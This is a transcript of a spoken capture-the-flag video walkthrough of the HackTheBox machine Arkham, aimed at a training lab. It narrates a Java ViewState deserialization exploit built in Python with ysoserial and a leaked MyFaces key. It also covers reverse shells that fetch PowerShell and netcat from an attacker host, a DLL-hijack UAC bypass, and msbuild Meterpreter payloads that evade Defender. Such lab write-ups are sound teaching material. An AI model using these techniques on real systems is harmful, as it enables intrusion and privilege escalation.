What's going on YouTube? This is Ipsec, and we're doing Arkham from HackTheBox, which was a relatively difficult machine for me, mainly because of the Java deserialization attack. It actually encrypts the Java object in the ViewState parameter, so you can't just find the deserialization by looking for magic bytes, ACED, or RO0. You have to do a bit of digging in the actual application. The decryption key for the object is in a SMBshare in a Lux container, so once you crack the Lux container, you can find that key in an old config file, do some magic in Python to encrypt the output of ySoSerial to get code execution on the box. Then when you're poking around the box, you can find credentials for an administrative user or in a PST file for Outlook. Your user's credentials get on the box as admin, but there is UAC preventing you from getting to the flag, so you have to do a UAC bypass, and when you do that, you are golden. So let's just jump into the box. As always, we begin with the nmap, so -SC for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it Arkham, and then the IP address, which is 10.10.10.130. Can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open. The first one is HTTP on port 80, and that's running Microsoft IIS version 10.0, so most likely dealing with a Windows 10 or 2016 box. Then you have your remote procedural calls on 135, 139. SMB is open on port 445. We have another HTTP port open on 8080, and that is running Apache Tomcat version 8537. Then outside of ports, nmap is telling us there is a clock skew of 7 minutes, so if we did anything like crypto or Kerberos related and have weird issues, I'd probably try getting my box in sync with the target box because those depend on time. And then finally, nmap is telling us that message signing is enabled but not required. Not going to really mean anything for HackTheBox machines because it's generally isolated to one machine, but if I saw this on like a pen test, I'd probably set up Responder and set it to do NTLM relay attacks while I work, just in case I intercept a request from an admin and can get escalate right away via NTLM relay. But probably not going to go in effect, so let's just move on and take a look at the web page. So going to 10.10.10.130, we just get the default IIS page. So I'd probably start running GoBuster in the background, see if I brute force anything, but I'm not going to do that right now because I'm doing the video and it takes up resources, which could slow down my machine. So checking on port 8080 and HTTP 10.10.10.130.8080. That was open. Let's see, nc-zv 10.10.10.130.8080. Let's see. It's just going extremely slow. That is bizarre. But we get a web page from mask stay hidden, and going down, I'm just looking for like potential domain names or usernames. So mainly looking for emails. We see this is in 15 New Street, Grey World, Wet World. I don't know. Looking at these Facebook, Twitter links, nothing there. If we click on company, doesn't do anything. About mask, we had already seen that. If we go to subscription, looks like it's loading. So while it does that, I'm going to click on contact us and just to subscribe to newsletter. Clicking on, what did I click on up there? This subscription link brought us to usersubscribe.faces, and I'm just going to test something. We'll do like test@test.com and see what it says. And just says, thank you, it's been registered. So I'm going to set up Burp Suite, and we're just going to see exactly what this does. So click sign up again, go to Burp, and we can see everything it's sending. So we have the ID, JSP, this is going to be the email, a function called sign up. We got javax.faces.ViewState, and then a long base64 parameter. ViewStates, I'm probably going to butcher the explanation, but essentially, instead of storing your entire cookie on the server, the ViewState is the cookie, I guess. And we can see a bunch of gibberish. I think if this wasn't encrypted, then we'd be able to see some data about it. So if we echo -n base64-d, just nothing. We can send this over to a file and do file against it, and it says it's data, so it doesn't recognize it. So we can Google around and see exactly what this parameter is. So if we go to Firefox, Google this, probably turn Burp Suite off, and then Google the javax.faces.ViewState. Maybe it's my internet that's going slow right now. And additionally, I'd be looking at what this .faces extension is. Doing either of these would get you to this page. So you can read this article, and it's not going to help us too much because the view state is encrypted. So let's see. Can we see if this one is encrypted? See, unencrypted view state. Yeah, so this is kind of what it should look like, I think. R00, RO0, this is a Java serialized object. That's just the base64 of it. So if we echo -n, base64-d, we can see java.lang.object. So that's what we'd expect to see if it's not encrypted. But because this one is encrypted, you have this issue. And you can also just Google for like the Java magic bytes, like Java magic bytes serialize, and it's that R00 or ACED. So if you see either ACED as the magic bytes or RO0AB, that's most likely going to be a Java serialized object. So since it's encrypted, we have to find a way to decrypt it. I'm going to go back over to my Nmap scan results and see if there was anything else. There is port 445, so let's try SMB map -H 10.10.10.130 to see if there's any open shares on this box. We just get access denied. I'm going to specify the user anonymous and try anonymous login on this box. And we no longer get access denied, and it starts listing out shares. So we see the admin share, no access, batshare, we have read-only. We have read-only over the IPC, and we also have read-only over users. So I'm going to specify -r for recourse, and then depth, we'll do 5. So we'll just start listing out all the files in these shares. So batshare, we see the file appserver.zip. These are all named pipes, essentially. And then we have the users directory, but we can only see default and guest. We can't go down into these folders unless we would have, because we have recurse set. So I'm going to do smbclient -u anonymous, and then //10.10.10.130, and this was batshare, I think. Or just hit enter for the password, do nothing, do ls, and we see the file there. So I'm going to do git appserver.zip to start downloading this, and it may take a little bit. Let's just open up a new pane and make sure it is downloading. So we'll do du-s appserver.zip, and it's not grabbing it. I guess we'll just wait for this command to finish. It just gave a weird error message, parallel read NT status IO timeout. I'm going to restart this. I'm not sure exactly what happened, but I don't think we should see that. So do git again on appserver.zip, and we'll see if it downloads it. LSLA. Still not getting it, but it may be running to a cached file somewhere. Let's try smbclient-n. This shouldn't do anything. Maybe it will. /batshare. And we can, actually before doing that, make dir smb. Do this. Git appserver.zip. And it worked. That is bizarre. Try this again. Git appserver.zip. it got it there. So I don't know why my SMB is being wonky. We can MD5 sum the two files to make sure we got the same thing. So MD5 sum appserver.zip and SMB appserver.zip. They are the same, so I'm just going to remove the one in my parent directory and go into this SMB directory. No idea why it was acting that way. So let's unzip this, and we got important.txt, and this is saying, Alfred, this is the backup image from a Linux server. Please see that the Joker or anyone else doesn't have unauthenticated access to it, Bruce. So this is the very first hint that this is going to be a Batman themed box, because you have Alfred the Butler, Bruce that is Batman, and the Joker. So definitely have something. We got appserver.zip, so if I just did unzip that, and that gave us the backup.img file. So if we do file against that, we can see it is a lux encrypted file. So if we go over to Google and search hashcat lux decrypt, we should get an article. I think Hacker Noon will be fine. And reading this whole thing gives you instructions how to get the header hash, ddif test of lux header, block size 512, count 4097. It's not always going to be there. I'd say like 99.9% of the time it's going to be there. But one safe thing to do is do crypt setup, lux dump on backup.image, and then this payload offset, that 4097 is just one above this. So we can do ddif equals backup.image, that is input file, of output file, Arkham-lux, block size equals 512, and count is equal to 4097. So now we should have the lux header, and we can send this over to hashcat. So I'm going to SCP this to the Kraken, which is just a cracking server I have that has graphics cards to crack. You don't need this, but I would recommend not doing any hashcat type stuff inside of VM because it's very CPU intensive, and you probably don't have much resources in your VM to crack. So that's why I'm copying it off my machine, and you should just copy it to like your host or somewhere else. So we can copy Arkham.lux to hashcat hashes, and we can go into hashcat and type hashcat -- example hashes and search for lux. Maybe it's all caps. There we go. And it's mode 14600. So I'm going to do /hashcat -m 14600 hashes Arkham-lux, and then the word list I'm going to use is rockyou.txt. This is probably going to take an extremely long time. You had a bunch of hints that the box was Batman themed with the name Arkham, Alfred, Bruce, the Joker. So you may just want to create a password list based upon just Batman characters and then try this, because Lux does not decrypt fast. So just let this go. We'll get the password and then keep on going. And there we have it. It has cracked the password as Lux or Batman Forever. So I can just copy this, open a new session, v passwords, and I'm just going to put Batman Forever there so we save it. And then we can go into the SMB directory and mount this. So we can do crypt setup, luksOpen, backup.img, and then we'll call it Arkham. Enter the passphrase, Batman Forever. And then if we look at dev mapper, we should now have Arkham here. So we can mount dev mapper Arkham into /mount. If we go in /mount, there is now a lost and found in a directory called mask. Go into mask, and we got a few JPEGs, documents, and Tomcat stuff. So I'm going to do nar list period to open up my file manager to look at this. So more Batman pictures. Going into documents, we have Batman Begins, and it looks like a script for it. So let's go back into Tomcat stuff, and it looks like we have a bunch of configs. So let's go Tomcat stuff. First thing I'm going to look at is Tomcat-users, and we see it looks like everything is commented out. One thing I should have done at the very beginning is go to, because it is Tomcat, try like /manager or maybe /admin to see if any of those endpoints exist on Tomcat, but doesn't look like they do. So nothing's too interesting in that Tomcat-users. We can look at server.xml. Let's see. Doesn't really look like anything too interesting. Let's do faces config. So now we have just the basic web page for faces. Nothing too interesting there. If we do web.xml and just look through this, it looks like something very stock. Let's look at the webxml.back, and this looks completely different than webxml. Like, this is very much the default webxml, and back is clearly something that is not default. So let's take a look at this a bit more. We have display name, hello world, JSF. Then we have the faces servlet, javax.faces web app faces servlet. Here's the extension, so anything with .faces will get sent through this config. If we keep going, we do have the org.apache.myfaces.secret, and then this, which is the key used to encrypt. So let's grab this, and it's also telling us it's HMAC SHA-1 for the algorithm. So yank. Did actually yank it? I'll probably just copy it in something else. V passwords did not, so let's just cat webxml.back, and where is it? Here it is. Let's grab this, paste it here. I know it's a secret, not a password, but same difference for us. So we want to make sure we can now decrypt that ViewState parameter. So let's see if that thing is valid. So to do that, we have to begin creating a Python script. So we'll call this exploit.py. The first thing I know I'll need is base64. So I'm going to do from base64 import b64 decode and b64 encode. Then I also know I need SHA-1, so I'll do from hashlib import SHA-1. So we can begin a function of def decrypt ViewState, and we can give it the parameter ViewState. So the key is equal to b64 decode, and then that will be cat passwords this. Okay, now we run into the problem of not knowing what encryption algorithm this is. So we could try print decrypt ViewState, and we just need to get a ViewState thing. So this string came from here. So this is the ViewState we want to decrypt. But we don't know how it was encrypted. So this is where we have to go and read documentation from Apache MyFaces. So if we do MyFaces, maybe web config. Let's see, what does this have? Is this the page? Yep. So let's see. this has like all the variables of how to do the web config, and we see there is this org.apache.myfaces.algorithm. If it's not defined, then it is des, but it can be other things like AES, triple des, and whatnot. So going to go into /mount, mask, Tomcat and stuff, grep for that against all those files, and we don't have anything. So this is telling us it is probably des. So I'm going to do Python 3, and I'm going to see if I can import pydes. I cannot, so I'm going to do pip3 install pydes, and while that installs, we can import pydes. We can import, I think hmac I forgot. So now that pydes is installed, we can begin the decryption. So let's do object is equal to pydes.des, pass it the key. This is going to be in ECB mode, and the pad mode is equal to pydes pad pkcs5. And you'd have to probably read the pydes manual to understand all this, but these are just the variables we saw in this. Here's that pkcs padding that I see. SHA algorithm, hmac SHA1. So just read that page and then created the correct parameters. So now we can do dec for decrypt is equal to obj.decrypt, and then we want ViewState. And that is going to be passed through the variable name. And if we print, we can just return dec. And we'll see what this does. We may get lucky and this may just work. Let's see. Data length must be within 8 bytes. It's going to be some type of weird padding. I don't think I'd have to do that because I have it specified in pad mode. Oh, I'm actually not unbase64ing the ViewState. So let's do ViewState is equal to B64 decode ViewState. So let's try this again. Still the same thing. Let's do print the length of ViewState. It is 92 characters in length, and an even 8 would be 96 or 88. So let's just pad this with 4 bytes. So let's do ViewState is equal to ViewState plus 4 null bytes. So now this should be a length of 96, which should be passing any padding. And there we go. So we see the ACED. So this is definitely a Java serialized object. And we can see java.lang.object. We could also, if we wanted to, print the B64 encoded version of this. And you can see that RO0. So definitely have the correct decryption key. So leave that there, and we can begin with creating a payload. So we're going to use ySoSerial to generate one. Do I have it? I do not. So let's go and Google ySoSerial, and we'll download this. So we don't want the .NET version. I didn't know there was a .NET. That could be fun to play with. But download the latest JIT pack. So we'll do wget. Let's make a directory ySoSerial. And then wget the jar file. And now we should be able to do java-jar ySoSerial, and we get it. So if you did a lot of searching around MyFaces, you know there's common collections. We actually got MyFaces here. I wonder if those would work, but I'm going to use common collections. So common collections 5. That should be up here. Yeah, that's the one I'm using. You can play around with a bunch of these to see if they work. I've used a lot of the common collections ones before, which is why I'm using that one. Then we can do cmd/c ping -n1 1010 14.3. And let's see. Thought that was it to generate. Maybe I misspelled common collections. Let's copy this. Paste it. There we go. So I'm going to direct this to root, HTB, boxes, Arkham, payload.bin. And we'll leave this here. After we get this working with common collections, we can try it with the specific one to MyFaces. So we do def create payload, and we can do payload is equal to open payload.bin read. And do we have to do anything like that? And we can return payload. We also need one for encrypt payload. So this will be these lines. And then we do encrypt is equal to obj.encrypt payload. And then we need to generate the hmax. So hash val hmax new key bytes encrypted SHA-1 digest. Okay. And now the payload is equal to the encryption plus the hmax, and we return the base64 encoded version of the payload. So let's see. Trying to think how I did this. Yeah, that's correct. So return encrypt payload. So when we call create payload, it's going to open payload.bin and read it, and it's going to pass that to encrypt payload, which is going to do this magic. And that should be it. So let's try print create payload. I think I put a underscore. I did. Python 3 exploit.py 27. There we go. So now we have our payload. The last thing we have to do is actually send the HTTP request. So we can import requests. And let's see. We'll do def exploit. Don't have to give it a command. ViewState is equal to create payload. And then data is equal to javax.faces.ViewState. .faces.ViewState. And then ViewState. Okay. Now we can do request.post, I think. This is a post request, yep. URL, let's define URL near the top. So URL is equal to HTTP 10.10.10.130/user subscribe.faces. URL data is equal to data. And that should be it. So we can just call exploit and we'll see if it works. So Python 3 exploit.py, go down here, tcp dump -i ton 0 icmp. Let this run. And we don't get anything. So we have a mistake somewhere. So let's print ViewState. And we'll do r is equal to this and print er.text. Okay. We have a 404 error, file directory not found. So chances are the URL is wrong. And it's probably because we didn't do port 8080. So did that, and now we have a callback. So every time I run this, we get a ping. We do see the web page is erroring out, so it doesn't look like we could get any text back. So this is kind of a blind exploit. So let's try one thing real quick. Let's copy payload.bin to works.bin. And let's try the ySoSerial with the faces. So the same exact thing, except we're going to try MyFaces 2. Did I? Java.jar, MyFaces 2. Maybe I screwed something. That's so weird. MyFaces 2. I guess I have the command format wrong in that way. Let's try MyFaces 1, since that generated a payload. If we cat this, it is a payload. So let's go back and just run our exploit script. And that one's not working. So recommend using the common collections. And common collections is just a Java library that's on the path. Deserialization exploits allow you to create gadgets into libraries that are on the path to achieve command execution. So the one thing I don't like about this right now is we don't have a way to easily edit the commands. We'd have to run ySoSerial every time. So if we look at payload.bin with xxd and go to where cmd is, we have cmd/c ping-n1, the IP address, and then this t. So just before cmd, you have 1b, which is going to be the length of this command. It's a serialized object, that's just the format. So if we take this out and then just put the length in ourselves and then put a command, we don't have to call ySoSerial anymore. We can just put any command we want. So let's do that. The first step will be getting this payload into a Python format, which is just hex, but a \x every 2 characters. So we'll do xxd-p payload.bin. And now we have to put the \x. So I'll do that with sed. We'll do sed, period for 2 characters, \x, and so that won't delete the what we had before. And then /g. So now you have all the \x's. And then we can for loop this. So for I in this command, do echo payload plus equals, then byte string I, and that quote, done. So now we have everything there. We can pipe that over to xclip-selection primary to put it on a clipboard, and then go back into our exploit script. So where encrypt create payload is, we can comment that out, paste, capital V, go all the way up where we want, and then I'm going to hit the like greater than sign, I guess. On a US keyboard, it is the shift period. And then we need payload is equal to be nothing. So let's see. What do we have to do now? We have to find CMD. So let's go man ASCII and find where C is. So C is hex 63. So we're looking for 63, 6D, then 64. So backslash X, 63, backslash X, I think I said 6D, and then 64. So this is where our string begins. So we can uncomment that, and we'll do payload plus equals, and then we have to do a command. So we want the character length, so len cmd, but this is going to be a integer, so we'll do the character of that, and then we also have to convert it back into byte format. So that's going to be the payload length. And I need to end all these parentheses. And then we do payload plus equals. And then cmd.encode. The .encode just puts it in byte format. And this will be the command. So what we have to do now is go to the very end. So we're looking for, I think it's 10. I think 1 is 33. What is 1? Let's find where 1 is. The hex decimal or hex character for 1. Where are digits? I'm just going to do Python 3 hex 1. Print hex 1. Oh, well, that didn't work. Oh, have it right here, 31. So I want 3130 because that's going to be an IP address. 33 is 3. So we want to search for backslash x 31, backslash x 30. So this is 10. 2E is period, 10, period, 10, then 33 will be 3, I believe. So let's go back into ASCII table and validate that. 33 is 3, and that's where a command ends. It's ping 10, 10, 14, 3. So put a quote here, and delete all this stuff. Okay. So now the thing to do is go up here and test this out by doing cmd is equal to cmd/c ping -n1 10, 10, 14, 3. And seeing if this still works. So Python 3 exploit.py tcp dump-i ton0 icmp, and it does. So now we can create a little loop and go along the way. So I'm doing create payload with a command. That's going to be cmd, and then we'll call exploit with the command cmd, and we'll just be lazy. We won't do the command line loop, we'll just do while true, and then exploit cmd, and we can say cmd is equal to input, please subscribe. So Python, let's get rid of this prints real quick. Print, we don't need these. There we go. cmd/c ping-n 1 10 10 14 3. Create payload is missing one required positional argument. Let's see. Create payload, cmd. Okay. Now if I copy and paste, it's working. So what we can do is now try to get a reverse shell. So we have the ability to see output. So we can do nc lvnp 9001, and we can also try out-of-band methods like encoding data in ping or DNS request, but just getting a reverse shell will be easier and quicker. So if this fails getting a reverse shell, that's when we move to other things. I'm going to make the directory www, go in here and copy opt nishang, what is it, shells, invoke, PowerShell TCP, .ps1, and let's call this shell.ps1. vi shell.ps1. Let's see, we want to grab this one, the reverse, and we'll put it here. We want 10 10 14 3, port 9001. So we can now save this and then just do python -m simple HTTP server, run on port 80, and now we can try the ix new object Net.WebClient download string HTTP 10 10 14 3 /shell.ps1, and it doesn't ever get to us. So what I'm going to do next is just try it without IEX, and maybe antivirus killed it because it didn't like IEX. Just basic troubleshooting, taking things out, and we don't get anything. So I'm going to try Invoke-WebRequest URI HTTP 10 10 14 3 /shell.ps1, and that one should have grabbed it. Let's try nc lvnp or tcp dump -i ton 0 icmp again. Just want to make sure this is working still. Ping works. Try and ping -n1 10 10 14 3. Ping twice, so we're not limited on like command length. Oh, duh. I'm not doing PowerShell. So we can try typing PowerShell and then paste. We don't get any hits with the new object. Let's try PowerShell with Invoke-WebObject. So PowerShell, paste that in. And we get a hit when we do Invoke-WebRequest. So let's actually move that one down here. Okay, that'd be a bit easier to read. So PowerShell constraint mode is probably enabled, which disables doing things like this. So we just have to do native PowerShell, which is fine. So we can go to Firefox. We can try to download Netcat 64, just do Netcat Windows. And let's see. eternallybored.org. This is the one I want. We can download this, then go into downloads, unzip, netcat, and then move nc64.exe to HTB boxes Arkham www nc.exe. So now we can do PowerShell IWR, which is just shorthand for Invoke-WebRequest -URI 10.10.14.3/nc.exe -out file. We'll save it to C:\Windows temp nc.exe. So we have it downloaded. We can try cmd/c. What do we want? C:\Windows temp nc.exe 10.10.14.3 I think it's -e for program to execute, and we'll do PowerShell.exe. And there we have it. We are now running as Alfred on the box. We can do whoami/priv to see if we had the sempersonate token, which we don't. So let's go to cd/, do a ls. We have users. Alfred is who we are. And then inside a desktop, we do have the user flag. We could also do like GCI or get child item -recurse period to list all the files. And you should do things like this because you see there is a Backup.zip. So we did GCI-recurse dot. We could also do select full name, which just puts it in a bit easier format. So we got tomcat.bat that we may want to look at. So we can just look at that, and doesn't seem too interesting. But this Backup.zip is pretty interesting. So we got to get this zip back to our box. So we could try to do it through netcat, but I'm just going to use certutil, and then we will copy and paste it. So certutil -encode, paste the path, and then we want to send it to C:\Windows temp backup.b64. Encode command completed successfully. So now we should be able to type Windows temp backup.b64. And let's see. Type C:\Windows temp backup.b64. There we go. So we can just highlight everything and then copy it down to our machine. Grab that. We'll open a new shell. We'll rename this to Alfred 3. Let's do vim backup.b64. Paste. Then we can base64-d to decode it, and then call it backup.zip. And then let's make dir Alfred, and we'll move backup.zip there. I just hate unzipping things in like my parent directory, and then they just have more files than I expected. But this just has one file, and that is a OST file. So if we do file against that, we just see it's a Microsoft Outlook email folder. We can do read PST against this, and then that creates a mailbox file. If we go into this, we can see just various emails from it. It's going to be like HTML encoded in base64, so it's not easy to read, but we do have evolution. I think we can just specify drafts.mbox, and evolution will import it. So if we just import the data, click next, location, fine, and we have one new message. Where is evolution? I don't see it open. Let's try just opening it without the argument. There we go. So we have on this computer, inbox 1, mailer daemon. If we open this, we have an email, probably from Alfred. It just says mailer daemon. To Batman, Mr. Wayne, please stop forgetting your password. And that shows the password for Batman. So let's move this down here so we can easily type. I'm going to move it up a little bit. There we go. So I'm going to go into my passwords file, vi passwords, and we want to do zx caret pound qzx plus t exclamation point 123. We can cat this so we can easily copy it. And now I want to do smb map -u batman -p, paste in the password -h 1010 10130. And we see it let us log in. So we have the password correct, but doesn't really buy us anything. We actually lost access, hilariously enough, because we used to have access to batshare. We don't anymore. So if we put in a bad password, let's just get rid of a few characters, we should see access denied. So we know we have Batman's password, it's just not working. So if we go to nmap, Arkham.nmap, see if there's any ports that we missed. Probably not. I mean, we can't really do psexec because we can't write to $C or admin$. And I don't see any other ports exposed to us. So I'm going to do nmap -p -v for verbose, OA, nmap all ports, 10 130. We can close out evolution. We don't need that anymore. And then while this runs, let's just try something over here. So let's try password is equal to convert to secure string. Oh, crap. Okay, let's cat credentials or cat passwords. Grab it. Go back to Alfred and let's run this command again. So what we're going to do is try PowerShell remoting through localhost because it doesn't look exposed over the network, but it may be exposed locally. We can't just do like run as because we don't have a full like shell. So this is like the next best thing. So that command should work. If we do pass, it says a system secure string. The next thing we have to do is create the credential object. So new object, system management, automation, PS credential. And this is going to be for Batman. And then we want to put the pass. Okay. So let's look at the host name. The host name is Arkham. Whenever you do like Windows remoting, you always should use host names and not IP addresses. So do Invoke-Command -computer Arkham. Oh, have I been spelling Arkham wrong all this time? ARKHAM. I think I've been doing AHM. Oh well. Arkham. And then we want to do -script block. Who am I? And then -credential cred. Okay, we have it running. We're now escalated to that user. So we can try downloading netcat again and grabbing it. So IWR -URI. What is it? 10.10.10.14 or 10.10.14.3 nc.exe out file nc.exe -credential cred. I wish I did RL wrap when doing this, because I would have saved myself headaches by allowing me to have like the up character. Oh well. So now that we've got netcat there, we can do cmd/c nc.exe 10.10.14.3 9001-e PowerShell.exe -credential cred. So let's try netcat lvnp 9001. Run this. And I'm going to learn from my mistake and do RL wrap this time. So let's just copy and paste this. Okay, so now that it's RL wrap, you can see this is going through previous box, but I have my up key. So that's very nice to have. And I can do Control L to clear the screen. So now that we are the Batman user, let's see what we have in our directory. So GCI recurse.select full name. And we don't really have anything else. There is another tomcat.bat file that we can look at. So we can look at that. Same exact thing. We can run like system info. And because we're in PowerShell constrained mode, that's why I'm not running like power up and things like that. We get access denied with system info. We can verify PowerShell constrained mode. So we'll just do like new object Net.WebClient. And we see only core types are supported in this language mode. So we did confirm that's why that wasn't working before. We can try like net local group administrators, and we see that we are a member of the administrator group. So if we just go cd ... cd administrators or cd administrator, we can't do it. We can, but we get denied whenever we ls inside of here. So we do who am I /all. We should see we have the same exact privileges as normal. Username, let's see. Here are the groups we're a member of, built-in administrators. But I'd expect to see more privileges. And this is because of UAC, the user access control. So there is a bypass to this. We could just do net use $127,001 $C, and then go into $, and then users administrator, and get his hash this way. So that's one way to do it. But if you wanted to, and I have no idea why this way works, honestly, because I had done chisel and forwarded port 445 from localhost to my machine, and it still didn't let me access the $. So I'm guessing even though we're specifying //127,001 $C, it's not doing it over the network. It's a different authentication than through like SMBClient or something. So not sure exactly why that works, but it does. Going to the UAC bypass, the easiest way to do this is getting a session under an interactive process, because most UAC things are based upon the process elevating and having a GUI. And right now we're not in a non-interactive mode, which means we just don't have access to those. So anything we do won't work. So the first thing I'm going to do is find a UAC bypass. I'm going to Google UAC me, and this just has bunches of good information. Let's see. Go near the bottom. I think when it has this, it's unfixed. So do the one from egress. Let's see, implementation, UCM egress method. If I just Google egress, UAC bypass, we go to his GitHub, and this explains how to find it. Find binaries that have auto elevate set to true, and then find ways to exploit them. So this one, if we create a DLL and place it in the Windows app folder, then this binary will load that DLL for us and execute it. So, and if you set UAC policy to always notify, then this auto elevate thing doesn't exist and these type of things are patched. So here it is. So you want the DLL srr.str.dll to be in, I think it's Windows apps. The Windows app folder. It says it somewhere. So right here. So if we put the DLL in C:users username app data local Microsoft Windows apps DLL, we can execute it. So what this is showing us, this is procmon, and procmon is running when it opens that file. And we can see it's looking for that DLL in all these locations and getting name not found. So it checks all these directories, which we can't write to. We can't write to the Windows directory most likely, but we can write to our user directory, and that's the final place it loads from. So that's why this is all working. So we have to do two things now. We have to create a DLL, and we also have to escalate to a interactive session process. So to get the interactive session process, we're going to use Meterpreter and Metasploit, and then to do the DLL, we'll just code it by hand. So this box does have Windows Defender on it, so we can't just drop Meterpreter. You could use like Go Ebola, that's EBOWLA. We've done that in other videos. If you just search IPsec Ebola, you can find the video that does that. But we're going to show a different one. We're going to use MS Build. So we'll do great SCT and go to this GitHub project, cd opt, git clone, download this, and then we have to set it up. So if we do setup, setup.sh, continue with installation, yes, and this will take a while to set up. So we'll rename this to great SCT, and then we'll start creating our DLL. So make dir DLL, and then we will make main.c. The first thing we do is this Windows definition, so include windows.h, and then we create the DLL. And this would probably be auto-generated for you if you used any like IDE or anything, but it's basic. So h instance, that, dword, dw, reason. Then we need lp void, lp reserved. Okay. And then switch, dw, reason. So these will be a case statement with everything. So DLL process attach. This will be do stuff. And we have to do semicolon break. Then case DLL process detach break. Case DLL thread attach. If you just looked at like the Windows API, you'd know all these commands. We have access to like DLL process attach because of that Windows.h. Click OK. This is just great SCT still installing. So case DLL thread detach break. Okay, we can close out of the switch. Then return 0. That. So do stuff. This is where we're going to do our code. So I'm just going to call when exec. I'm going to do c:users batman nc.exe 10.10.14.3 9001-e PowerShell, and like that. So upon attaching the DLL, we'll just call this netcat binary and send us a reverse shell. That is it for the DLL. So we can close out of that and then do i686, Windows 64, min.gw, g++, main.c, standard compiling flags. Then the name was srrstr.dll, dash shared because it's a DLL. And let's see. We probably have a typo. Yep. Deteach. Detach. Compile. And now we got the DLL. Great, SCT is still installing. So we just got to wait for this to complete, and then we can get our DLL set up. Actually, I guess we could copy it over. So go here. We can copy this to www. Go back to a Batman shell. We know we can write into this directory, so IWR Invoke-WebRequest URI HTTP 10.10.14.3 srstr.dll-out file. Same thing to download this. ls. Okay, we got it. I guess we should have done that once we went in here, but we got to go into where is it? It was app data local app data local Microsoft Windows apps. Microsoft Windows apps. So copy c:\users Batman srstr.dll to this directory. Okay. So that's all now set up, and it's still doing something. I don't know why it's, I guess it did an apt update because now it's installing Metasploit framework, which I know I have. So it's probably just updating it. So if we have an interactive session and execute this binary, we will get a shell. Didn't mean open link. Did I go to my clipboard? It did not. Let's go back. Copy. We can do nclvnp 9001. I wonder if this will kill my shell. That's not it. There we go. Fail to run. Operation requires an interactive window. So just got to wait for this, which now it is finally done. So we can go cd ... and execute this application. So we can just type list to see the available tools. It's only got bypass. We'll choose one. We'll do list again. Menu choice, one. Use one. Okay. So now we got 26 payloads to choose from. So we can do list again and see all the payloads. I'm just going to use Meterpreter reverse TCP. So use 9. So now we just specify lhost, lport, and such, and it should work. So we can set lhost 10.10.14.3, set lport, we'll do 9002, and then generate. Base name for the output files, default is payload. It's fine with me. So now we got the Metasploit RC file. So we can do msf console -r, paste the RC file. Then we can grab this payload.xml and copy this to the www directory. Okay, so now we just have to download this payload. So Invoke-WebRequest, and then URI 10.10.14.3 / payload.xml out file payload.xml. So now we have it. And the final thing is to use msbuild to execute this. So now we just have to find where msbuild is. And that is normally in C:\Windows Microsoft.net. And then we want framework 64. Then v4.0.30319. And msbuild should be in there. So msbuild.exe, specify payload.xml, and I guess we can do cmd/c. Build started. It errored, but we got Meterpreter Session 1 has been opened. So we can do sessions-i1. And I'm going to move my netcat shell over to my Meterpreter window. And Meterpreter Session 1 died. Let's try this again. I don't think it's supposed to be getting those errors. If we do sessions-i2, I doubt it works. If we do help, it only loads the core commands and never loads the advanced API. So what I think happened is I loaded the 32-bit version and Great SCT did 32-bit Meterpreter, and I specified framework 64, which does the 64-bit version of msbuild, which isn't working. So I got rid of framework 64 for framework, and I'm not getting that error message anymore. And it looks like it's working. If I do help, we have standard API commands. So now I can do PS, and we can try to migrate in 5020. And this may take a few times because Windows Defender may kill it, or it may not. It doesn't always kill it for some reason. So this time it looks like it's going to die, which means we'll just have to get another session and do this again. So probably take 3 or 4 times. So the first one timed out. Let's do this again. Session 4 opened. So let's do sessions-i4, PS, migrate 5020. And all we have to do is migrate in a process that has this 1. So we got in. So now if I do shell, we can go to where Batman is. And let's go up. Where was that application that required interactive? Interactive. I guess we can just copy it. So still here. All I'm going to do is copy this. Go back to here. Paste it in. And nothing. Well, that's unfortunate. Let's do cd\users Batman local cd users Batman app data local dir cd Microsoft cd Windows apps, I think. dir DLL is there. SystemPropertiesAdvanced.exe. Not working. Could have swore that would work. Let's see. Let's look back at our DLL. V main.c c:\users Batman nc.exe. Let's make sure that exists. dir we do not have netcat here. So we probably put netcat somewhere else. Let's just download it. URI 10.10.14.3 nc.exe out file nc.exe. dir. Now that netcat is there, paste, and still nothing. Let's see. C:users batman nc.exe 10.10.14.3. That should work. Let's just copy and paste this into our Batman shell. Go here. Okay, that works. I guess we could try run DLL32. DLL definitely works. Don't know why that application is not going. SystemPropertiesAdvanced.exe. Let's just try cmd/c, SystemPropertiesAdvanced.exe. It's taking longer this time, but we still aren't getting a shell. I wonder if my shell up here is just dead, and that's why. Exit yes. Let's do ps. PID. How do I do? Find out what process I'm in. Get system. Let's see. UID no. PS. Let's just try this one more time. cmd/c. Let's try full path. Windows syswow64 SystemPropertiesAdvanced.exe. See, and let's make sure I'm doing 9001, which yes I am. nclvnp 9001. Run. There we go. I wonder if we needed the full path, or maybe I don't know. If we do whoami/all now, we can see a bunch more privileges than the just 2 we had previously. If we go to cd users, administrator, desktop, we can get root.txt. So let's play with this real quick. Let's do shell. If we just do this, doesn't execute. cmd/c, that, cmd/c, and then the full path. Let's see, I guess we have to kill it now. Advanced. So I guess we can kill 1764. Okay. Shell. SystemPropertiesAdvanced.exe. So if we just run this, nothing. cmd/c, run that, nothing. cmd/c, c:, Windows syswow64, that. That's literally what I just did. Maybe it didn't kill it. So let's see. This was the one. cmd/c, Windows syswow, SystemPropertiesAdvanced.exe. It can't be the casing on this, can it? I'm going insane right now. PS system. We're going to try this one last time. Advanced. So kill 2156. Okay. Shell. So nclvnp 9001. Paste that. All I want to grab is this. Nothing. cmd/c. Nothing. Let's get out of system32. Okay. cmd/c. c:, Windows, syswow 64. That. So capital S, capital W. cmd/c, c:, Windows, syswow 64. I'm not sure why it works sometimes and why it doesn't work other times. Unless I keep making weird typos. Let's see. Maybe it just doesn't like the session. Maybe it's because I keep doing a new session. Let me just copy this. Exit. PS. Advanced. It's probably related to that, actually. So kill 2368. Shell. Yeah. So probably should be one of the first commands you run in the session. If you do other ones, you may just put it in a weird state. So hope you guys enjoyed that box. Take care, and I will see you all next week.